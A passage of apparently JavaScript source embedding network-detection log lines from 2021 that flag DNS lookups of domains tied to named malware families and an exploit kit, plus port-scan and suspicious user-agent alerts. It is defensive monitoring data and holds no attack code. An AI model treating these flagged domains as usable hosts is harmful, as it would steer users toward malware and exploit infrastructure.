    '"2021-01-11 01:53:34.000465" r2d2 2.200.108.59 33356,33942,34188,35694,35762,36216,36896,38588,39642,40022,40902,40994,42144,42902,43900,44062,46758,47508,47788,48544,48724,48854,50708,53086,53884,54122,54686,55430,56402,57158,57492,57876,58860,58964,59946,60344 77.53.81.105 5227,6089,10391,14536,14808,15749,18519,23429,23649,24428,25545,25747,25868,26987,29906,29962,31641,33158,34885,39022,40558,42778,43725,44938,45923,48481,49045,53271,53768,58621,58834,60924,61124,61916,62008,64849 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:53:51.743423" r2d2 10.1.81.47 64085 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 01:53:51.744354" r2d2 2.200.109.50 60875 8.8.8.8 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 01:53:59.608406" r2d2 2.200.110.232 63400 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:53:59.611216" r2d2 2.200.107.146 36215 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:53:59.621221" r2d2 2.200.110.232 64215 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:54:07.319957" r2d2 2.200.110.233 49227 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:54:08.412509" r2d2 2.200.110.233 65086 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:54:08.760903" r2d2 2.200.110.233 63545 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:54:08.584188" r2d2 10.1.19.42 59292 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:54:27.204289" r2d2 10.3.160.42 13685 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:54:27.304041" r2d2 10.3.160.42 13685 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:54:27.403958" r2d2 10.3.160.42 13685 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:54:27.604352" r2d2 10.3.160.42 13685 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:54:28.305426" r2d2 10.3.160.42 13685 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:54:28.804520" r2d2 10.3.160.42 13685 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:54:29.406063" r2d2 10.3.160.42 13685 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:55:16.970498" r2d2 2.200.110.232 65251 2.200.107.169 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:55:17.080424" r2d2 2.200.110.232 63738 2.200.107.169 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 01:55:17.081173" r2d2 2.200.110.232 64129 2.200.107.169 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:55:17.082250" r2d2 2.200.107.146 34335 192.26.92.30 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 01:55:17.082644" r2d2 2.200.107.146 33489 192.26.92.30 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:55:17.107857" r2d2 2.200.110.233 64911 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 01:55:17.109250" r2d2 2.200.110.233 63361 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:55:17.110096" r2d2 2.200.110.232 64429 2.200.107.169 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:55:17.111639" r2d2 2.200.107.146 23198 173.201.76.9 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:55:17.180476" r2d2 2.200.110.232 63536 2.200.107.169 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:55:17.209401" r2d2 2.200.110.233 63998 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:55:17.470122" r2d2 2.200.110.232 64663 2.200.107.169 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:55:17.479988" r2d2 2.200.110.232 64244 2.200.107.169 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:55:17.489652" r2d2 2.200.110.232 65393 2.200.107.169 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 01:55:17.819874" r2d2 2.200.110.232 64454 2.200.107.169 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 01:55:18.250179" r2d2 2.200.110.232 64647 2.200.107.169 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:55:18.599979" r2d2 2.200.110.232 64977 2.200.107.169 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:55:18.761417" r2d2 2.200.107.146 27886 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:55:18.760105" r2d2 2.200.110.232 65113 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:55:18.811009" r2d2 2.200.110.233 63261 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:55:42.057927" r2d2 2.200.107.248 21615 8.8.8.8 53 UDP DNS (update).drp.su "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:55:42.057685" r2d2 2.200.107.248 21615 8.8.8.8 53 UDP DNS (update).drp.su "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:55:42.969370" r2d2 2.200.110.232 64217 2.200.107.169 53 UDP DNS (td-username-db4-63-169).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 01:55:43.383568" r2d2 2.200.110.232 65166 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:55:43.385317" r2d2 2.200.107.146 28209 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:55:49.220319" r2d2 2.200.105.226 58162 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:55:49.220430" r2d2 2.200.105.226 58162 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:55:49.220311" r2d2 2.200.105.226 58162 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:56:27.400273" r2d2 10.3.160.42 13686 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:56:27.494327" r2d2 10.3.160.42 13686 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:56:27.593996" r2d2 10.3.160.42 13686 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:56:27.797913" r2d2 10.3.160.42 13686 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:56:28.096706" r2d2 10.3.160.42 13686 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:56:28.496536" r2d2 10.3.160.42 13686 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:56:28.812208" r2d2 2.200.110.232 65427 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:56:28.846537" r2d2 2.200.110.233 63683 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:56:28.993815" r2d2 10.3.160.42 13686 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:56:29.597978" r2d2 10.3.160.42 13686 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:56:46.381702" r2d2 2.200.110.232 63890 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:56:46.412547" r2d2 2.200.110.233 63284 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:56:59.608347" r2d2 2.200.110.232 49177 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:56:59.610384" r2d2 2.200.107.146 55657 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:57:03.742236" r2d2 2.200.110.232 65439 2.200.107.169 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:57:04.151483" r2d2 2.200.110.232 49172 2.200.107.169 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:57:04.152898" r2d2 2.200.107.146 5389 173.245.58.63 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:57:26.207668" r2d2 2.200.107.169 53 2.200.110.232 64001 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:57:26.207661" r2d2 2.200.107.169 53 2.200.110.232 64001 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:57:37.007794" r2d2 2.200.110.233 65250 2.200.107.169 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:57:37.125674" r2d2 2.200.110.232 49404 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 01:57:37.127129" r2d2 2.200.107.146 17358 37.209.192.12 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 01:57:37.136279" r2d2 2.200.110.233 49173 2.200.107.169 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:57:38.847554" r2d2 2.200.110.232 49238 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:57:38.878437" r2d2 2.200.110.233 63607 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:58:04.777238" r2d2 2.200.107.146 30668 35.174.165.68 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 01:58:04.775723" r2d2 2.200.110.233 63749 2.200.107.169 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 01:58:43.385533" r2d2 2.200.110.232 65257 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:58:43.386857" r2d2 2.200.107.146 53216 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:58:43.402309" r2d2 2.200.110.232 65188 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:58:43.405320" r2d2 2.200.107.146 63454 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:58:48.878531" r2d2 2.200.110.233 64440 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:59:04.330027" r2d2 10.1.19.42 59295 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:59:26.695628" r2d2 178.17.174.14 42042 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; FunWebProducts; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:59:57.128638" r2d2 2.200.110.232 64510 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:59:57.349383" r2d2 2.200.110.232 63383 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:59:57.351036" r2d2 2.200.107.146 34461 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:59:57.388300" r2d2 2.200.110.232 65011 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 01:59:57.397352" r2d2 2.200.110.233 63611 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:59:58.908730" r2d2 2.200.110.232 65305 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:59:58.910327" r2d2 2.200.107.146 31782 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:59:58.937048" r2d2 2.200.110.233 63381 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:59:59.607735" r2d2 2.200.110.232 63614 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:00:27.775936" r2d2 10.3.160.42 13688 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:00:27.873873" r2d2 10.3.160.42 13688 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:00:27.973796" r2d2 10.3.160.42 13688 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:00:28.176687" r2d2 10.3.160.42 13688 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:00:28.474397" r2d2 10.3.160.42 13688 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:00:21.622522" r2d2 10.1.19.42 59297 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:00:28.873469" r2d2 10.3.160.42 13688 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:00:29.373641" r2d2 10.3.160.42 13688 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:01:08.940738" r2d2 2.200.110.232 64145 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:01:08.942233" r2d2 2.200.107.146 53511 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:01:08.968754" r2d2 2.200.110.233 64502 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:01:43.381488" r2d2 2.200.110.232 65333 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:01:53.735172" r2d2 10.1.19.42 59298 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:02:18.973021" r2d2 2.200.110.232 63578 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:02:18.974237" r2d2 2.200.107.146 12469 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:02:19.005222" r2d2 2.200.110.233 63814 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:02:37.061596" r2d2 2.200.107.146 46818 205.251.195.176 53 UDP DNS juronu.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:02:37.058871" r2d2 10.14.192.212 63680 10.1.192.236 53 UDP DNS juronu.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:02:37.060213" r2d2 2.200.110.232 63431 2.200.107.168 53 UDP DNS juronu.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:02:48.414819" r2d2 2.200.107.146 14677 185.159.197.150 53 UDP DNS ns1.frobbit.se "rogue dns (malicious)" (static)\n' +
    '"2021-01-11 02:02:59.609597" r2d2 2.200.110.232 64813 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:02:59.619685" r2d2 2.200.110.232 64665 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:03:27.406690" r2d2 2.200.110.233 64094 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:03:29.015375" r2d2 2.200.110.232 63680 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:03:29.052785" r2d2 2.200.110.233 65185 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:03:31.000004" r2d2 2.200.108.59 24268,24270,24271,24272,24275,24277,24278,24280,24281,24284,24285,24287,24288,24289,24291,24293,24295,24297,24302,24303,24307,24308,24310,24312,24313,24316,24317,24323,24325,24327,24334,24337,24340,24341,24342,33402,33672,33676,33692,33784,33802,33850,34000,34100,34530,34574,34638,34844,35032,35216,35338,35844,36006,36200,36274,36520,37462,37468,37616,37698,37886,38002,38012,38260,38332,38488,38500,38782,38834,38852,38990,39200,39354,39406,39412,39484,39528,39570,39648,39834,40136,40139,40140,40142,40144,40145,40146,40147,40149,40152,40318,40394,40396,41140,41534,41654,41958,42132,42220,42552,42608,42662,42698,42794,42914,42966,42982,43004,43250,43484,43544,43580,43982,44096,44564,44932,45194,45504,45968,45972,46054,46146,46204,46264,46308,46311,46313,46314,46315,46319,46321,46322,46324,46436,46660,46694,47088,47224,47228,47252,47486,47536,47562,47564,47566,47980,48004,48204,48534,48696,48952,49558,49598,49882,50300,50356,50464,51146,51334,51366,51488,51766,51828,52298,52400,52534,52576,52588,52790,52866,52878,53160,53192,53456,53536,53812,53970,54332,55016,55178,55492,55602,55706,56152,56440,56506,56710,56950,57438,57468,57506,57724,57746,57778,58092,58264,58288,58600,58688,58830,59020,59108,59476,59682,59856,60328,60500,60622,60822 77.53.81.105 21,5472,5817,6945,7047,7367,8007,8253,8265,9375,9802,10860,11262,11506,11564,12401,12431,13545,13735,14043,14553,14901,14995,15213,15433,15632,16196,16603,16620,16742,17011,17054,17301,17304,17500,18218,18433,18652,18843,18910,20300,20412,20556,20660,21537,22044,22229,22327,22490,23083,23426,23654,24006,24048,24465,24721,26000,26387,26837,27077,27721,27818,28229,28646,28670,29402,29940,30386,30977,31781,32006,32706,32847,33486,33597,33829,35186,35240,35608,35739,35884,36111,36161,36653,37005,37408,37705,37900,38217,38331,39067,39416,39748,39890,40605,40810,40964,41469,42125,43007,43168,43627,44128,44371,44480,44760,46268,47981,48258,48611,48719,48828,49798,50204,50264,50766,50871,51058,51327,51393,52203,52733,52924,54932,55196,55238,55845,56543,56604,56788,56992,57857,58017,58049,58893,59129,59725,59965,60361,60855,61124,61143,61221,61224,61287,61681,62035,62062,62218,62389,62698,62785,63125,63217,63253,64149,64328,64516,64542,65137,65484 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:03:31.000061" r2d2 2.200.108.59 24269,24272,24275,24278,24279,24280,24282,24283,24285,24286,24288,24291,24293,24294,24296,24299,24300,24301,24302,24304,24306,24307,24309,24315,24320,24321,24322,24324,24326,24327,24328,24329,24335,24336,24338,24343,24344,24345,24346,24347,24349,24351,24352,24353,24355,24363,24364,24365,24367,24369,24370,24372,32972,33402,33404,33774,33850,34530,34844,34970,34976,35216,35288,35338,35352,35420,35592,35844,36094,36196,36198,36200,36260,36274,36288,36520,37002,37058,37072,37208,37246,37390,37588,37698,37850,37954,38002,38158,38186,38332,38338,38402,38500,38782,39022,39354,39406,39412,39484,40016,40136,40138,40141,40143,40147,40150,40155,40157,40158,40160,40224,40380,40392,40396,40398,40698,40800,40946,41134,41274,41534,41642,41740,41948,42036,42164,42268,42336,42384,42608,42640,42648,42662,42794,42914,43004,43024,43092,43484,43544,44096,44188,44246,44654,45186,45194,45300,45342,45372,45684,45720,45972,46112,46307,46308,46316,46317,46322,46329,46331,46332,46334,46335,46578,46926,46950,47118,47136,47182,47318,47536,47548,47562,47564,47668,47980,48192,48204,48408,48808,48952,49120,49226,49302,49430,49558,49714,49882,50054,50230,50318,50356,50400,50464,50468,50510,50692,50754,50814,50994,51208,51222,51366,51374,51442,51568,52014,52052,52316,52330,52364,52400,52534,52602,52614,52616,52626,52792,53192,53258,53536,54288,54312,54406,54434,55118,55172,55714,55782,56148,56216,56426,56428,56460,56908,56924,57004,57098,57250,57272,57468,57716,57806,57916,58092,58318,58722,58742,58772,58830,59020,59108,59134,59216,59250,59462,59476,59682,60104,60328,60396,60448,60512,60622,60780,60876 77.53.81.105 21,5472,5825,6770,7047,7367,7515,7524,7610,8265,8301,8718,8865,9081,9214,9971,10296,10499,10925,11305,12094,12401,13332,13428,13494,13545,13735,14043,14103,14515,14671,14854,14995,15213,15433,15505,15531,15897,15987,16196,16603,16742,16754,17054,17500,18148,18168,18218,18356,20412,20556,21537,22229,22327,22560,22798,23083,24467,25372,25834,26000,26208,26387,27077,27166,27187,27188,27442,27635,27916,28463,28670,28902,29402,29706,29852,30362,30384,30386,30395,30435,30977,31007,31579,31613,31766,31973,32493,32855,33038,33387,33486,33734,34761,35340,35390,36195,36218,36653,36876,37559,37705,37953,38195,38217,39748,39867,40390,40810,40982,41628,42125,42205,42278,43007,43168,44025,44095,44190,44371,44521,45038,45352,46268,46436,46550,46789,47615,48248,48258,49864,49888,50067,50091,50788,51135,51345,51690,51831,52165,52397,52810,52831,52924,53370,53778,53786,54166,54264,54932,55084,55830,55904,55958,55980,56788,57127,57412,57643,57947,57970,58065,58436,58927,59081,59725,59799,60465,60516,60557,60724,60757,60972,61124,61326,61535,61638,61887,62062,62218,62655,62698,62785,62927,63125,63187,63217,63556,63593,63897,64542,65261,65297,65393 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:03:31.000054" r2d2 2.200.108.59 24269,24270,24273,24274,24276,24277,24283,24286,24290,24294,24296,24298,24301,24304,24305,24309,24310,24311,24312,24314,24315,24317,24318,24319,24321,24322,24324,24329,24335,24337,24338,24339,24340,24343,24345,24346,24348,24354,24356,24357,24359,24360,24361,24362,24364,24366,24367,24370,24372,24373,24375,24377,24378,24380,24381,24382,24383,32972,33082,33160,33196,33354,33474,33672,33692,33694,33774,33802,33862,33974,34000,34198,34280,34648,34754,34780,34870,34872,34970,34976,35246,35288,35352,35354,35728,35932,36094,36196,36198,36260,36288,37058,37600,37616,37850,37886,37954,38260,38338,38402,38488,38664,39022,39200,39252,39648,39718,39876,39964,39980,40016,40112,40137,40139,40141,40142,40144,40148,40149,40150,40151,40152,40153,40154,40156,40158,40159,40394,40546,40698,40724,40878,40946,41108,41850,41948,42078,42132,42164,42220,42338,42384,42648,42698,42776,43004,43092,43762,44138,44246,44336,44482,44654,44738,44956,44994,45186,45222,45236,45716,45968,46038,46146,46206,46264,46309,46310,46311,46312,46313,46314,46316,46318,46319,46320,46321,46324,46325,46326,46327,46328,46329,46330,46333,46335,46337,46370,46436,46578,46754,47000,47088,47224,47252,47318,47438,47486,47500,47668,48004,48154,48360,48398,48534,48696,49302,49598,50054,50084,50318,50368,50434,50468,50524,50574,50994,51100,51146,51442,51488,51568,51766,52014,52182,52230,52298,52316,52330,52364,52588,52602,52626,52790,52792,52866,53258,53460,53812,53944,54332,54484,54486,54678,54950,55016,55072,55118,55178,55368,55714,55866,56148,56170,56300,56364,56638,56908,56924,56930,56950,57004,57098,57110,57148,57250,57278,57716,57724,57806,57916,58264,58288,58302,58482,58600,58688,58742,58772,59134,59216,59250,59476,59560,59856,60396,60512,60780,60814,60822,60876 77.53.81.105 21,5595,5715,5817,5825,6424,6770,6945,6949,7610,7677,8013,8035,8301,8376,9050,9069,9214,9338,9375,9537,9802,10499,10860,10925,11038,11211,11305,11506,11564,12094,12431,13066,13838,14229,14553,14671,14854,14901,15221,15897,15987,16513,16754,17011,17145,17208,17304,17334,17436,18353,18910,20300,20736,21250,22044,22560,22709,22798,23426,23654,23701,23756,24048,24106,24130,24465,24849,25079,25795,25834,25864,26208,26420,26821,26837,27187,27188,27442,27818,27916,28507,28902,29706,29852,29948,29987,30041,30384,30395,30424,30847,31007,31613,31766,31973,32006,32207,32995,33597,34463,34581,34761,35186,35390,35884,36030,36814,36876,37307,37731,37900,37953,38518,39067,39416,39805,39867,40390,40605,40799,40964,41002,41326,42205,42235,42278,42980,43142,43295,43902,44128,44190,44480,44521,45352,46152,46789,47615,48452,48611,48624,49864,49888,50003,50597,50745,50766,51327,51393,51690,52397,52408,52810,53370,53778,53786,53943,54044,54166,54876,55180,55196,55238,55621,55845,55904,55958,56376,56443,56604,56789,56869,56992,57857,57947,59081,59314,59473,59965,60361,60516,60724,60757,60972,61287,61326,61338,61535,61638,61681,62034,62565,63253,63519,63593,63889,63965,64315,65137,65147 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:03:35.000590" r2d2 2.200.108.59 24348,24350,24351,24353,24354,24356,24358,24359,24361,24362,24368,24369,24371,24374,24376,33474,33694,33756,34280,34322,35728,35968,36042,36988,37200,37620,38158,38190,38940,40050,40126,40155,40157,40160,40161,40398,40724,40878,41208,41274,41642,42036,42078,43134,45434,46327,46330,46332,46336,46754,47438,47548,47980,49288,49430,50368,50400,51264,52230,52616,54486,54736,54812,55072,55368,56930,57110,57242,57272,57656,57962,58302,58722,59640,60538 77.53.81.105 21,6424,7524,8013,9069,9537,11038,11794,14515,14640,16968,17436,20736,21513,23701,23756,23831,24106,27635,28361,29948,30203,30362,32245,32493,33734,33800,34947,36218,36679,40472,40553,41095,41628,43272,46550,48624,54787,54975,56789,56791,56871,57602,59557,60171,61338,61662,61910,62034,62565,62655,63187,65147 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:03:37.000058" r2d2 2.200.108.59 24375,24377,24378,24379,24380,24383,35932,35968,37200,38940,39698,40126,40162,42338,45222,46148,46336,48962,50682,51264,54812,60010,60126 77.53.81.105 21,9338,13838,21475,21513,21790,28361,30203,36354,39148,53248,56871,60171,61662,62253,63519 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:04:06.816051" r2d2 2.200.110.232 49228 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:04:07.360368" r2d2 2.200.110.232 63888 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 02:04:07.363899" r2d2 2.200.107.146 13474 205.251.194.217 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 02:04:24.945009" r2d2 2.200.110.232 64155 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:04:24.946588" r2d2 2.200.107.146 29337 46.101.179.64 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:04:30.208008" r2d2 10.3.160.42 26021 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
